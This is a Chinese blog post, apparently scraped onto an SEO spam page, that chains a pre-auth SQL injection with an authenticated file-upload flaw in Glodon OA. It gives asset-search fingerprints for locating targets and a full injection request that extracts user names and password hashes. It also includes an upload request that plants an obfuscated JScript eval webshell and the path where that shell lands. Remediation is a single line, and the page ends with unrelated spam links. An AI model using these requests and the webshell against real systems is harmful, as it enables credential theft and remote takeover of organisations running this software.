当前位置: 首页 > news >正文

中心网站建设做网站教程pdf

中心网站建设,做网站教程pdf,网站 售后服务,国内便宜云服务器文章目录 前言资产特征前台sql注入后台文件上传解决办法 前言 最近看到广联达OA的前端sql注入和后端文件上传漏洞联动的poc 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端云大数据”产品/服务,提供产业大数据、产业…

文章目录

  • 前言
  • 资产特征
  • 前台sql注入
  • 后台文件上传
  • 解决办法

前言

最近看到广联达OA的前端sql注入和后端文件上传漏洞联动的poc

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。

广联达协同办公管理平台其实之前听得比较少,查了下公司资料,怪不得都是建工类的公司在用

资产特征

鹰图:web.body=“/Services/Identification/Server/”

fofa :“/Services/Identification/Server/“或者fid=”/yV4r5PdARKT4jaqLjJYqw==”

前台sql注入

下面先来看一下poc

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

根据这个poc可以看到,漏洞存在的路径为/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary,先来看看这个地址上面有什么
在这里插入图片描述
在这里插入图片描述
基本上就是报错提示缺少参数值,那么注入点应该就是这里了

可以看到poc的正文为
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
查询key值通过'就绕过了,执行后面的sql语句

这个查询语句是一个SQL语句,它的作用是从"T_ORG_USER"表中选择前1812行数据,并返回一个结果集。

具体来说,这个查询语句使用了UNION
ALL操作符来合并两个SELECT语句的结果集。第一个SELECT语句是固定的,它返回一个名为"dasdas"的列,并且该列的值为"&key=1’"。第二个SELECT语句使用了TOP
1812来限制结果集的行数,然后使用CONCAT函数将"F_CODE"和"F_PWD_MD5"两个字段的值连接起来作为结果集中的一列。

总结起来,这个查询语句的目的是从"T_ORG_USER"表中获取前1812行数据,并返回一个包含"dasdas"列和连接后的"F_CODE:F_PWD_MD5"列的结果集。

那么来看一下会有什么响应吧
在这里插入图片描述
可以看到在result的value里面,会将用户名和密码的md5值通过:连接回显出来

可以去解md5的平台将管理员的密码解出来,当然不是白解的
在这里插入图片描述
登陆进来后是下图
在这里插入图片描述

后台文件上传

同样先上poc

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 登录后的cookie------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>------WebKitFormBoundaryFfJZ4PlAZBixjELj--

首先找一下漏洞位置,可以看到是一个附件上传的地方,并且会返回result,应该会返回地址
在这里插入图片描述
来看一下poc会响应什么
在这里插入图片描述

可以看到上传后的文件名为0fc5eab1-03f0-4249-882d-7533247532b0-123.aspx

那么这个文件上传到的地址为哪里?

/GTP/IM/Services/Group/Upload/0fc5eab1-03f0-4249-882d-7533247532b0-123.aspx
在这里插入图片描述
注意上传webshell的时候要传aspx马

解决办法

打补丁、升级版本
在这里插入图片描述

http://www.yayakq.cn/news/759740/

相关文章:

  • 非官方网站建设电商类网站
  • 什么做直播网站好青岛做公司网站注册的多吗
  • seo网站设计招聘网站建设怎么上传不了图片
  • 网站推广策划方案模板北京免费网站建设
  • 游戏网站制作教程做网站js还是jq
  • 贵阳有哪些做网站的公司软件毕设代做网站
  • 网站注册备案之后怎么做富文本编辑器wordpress
  • 做慕课的网站谷歌seo网站推广
  • 网站如何做支付接口商务网站规划与建设心得
  • 网站怎么做图片放映效果教育机构网站建设方案书
  • 网站开发公司制作平台同步网站内容怎么做
  • 做设计必须知道的几个网站吗旅行社电商网站怎么做
  • 各学院二级网站建设通报绵阳科技网站建设
  • 运营一个网站的费用微网站怎么做的好处
  • 服务好的网站设计seo网络推广有哪些
  • 周村家具行业网站建设全国招聘网最新招聘信息
  • 国外做免费的视频网站有哪些怎么制作图片水印
  • 个人网站设计论文的结论网页设计选题
  • seo企业网站优化一级a做爰片免费网站迅雷下载
  • 成都网站建设优惠活动怎么建立一个网站广告
  • 网络推广策划案该怎么写网站更换服务器对seo的影响
  • 水淼wordpress网站seo入门基础教程
  • 建设网站需要哪些经营范围广西建设工程造价管理协会网站
  • 章丘灵通环保设备在哪个网站上做的重庆找工作的网站
  • 金方时代做网站怎么样html网站模板 淘宝商城
  • 做网站贵不贵在线免费crm黑白配
  • 如何进行网站优化设计wordpress回复邮箱
  • 自己建设企业网站有什么网站
  • 专业网站建设公司地址做美工参考网站
  • 企业网站下周手机网站建设策划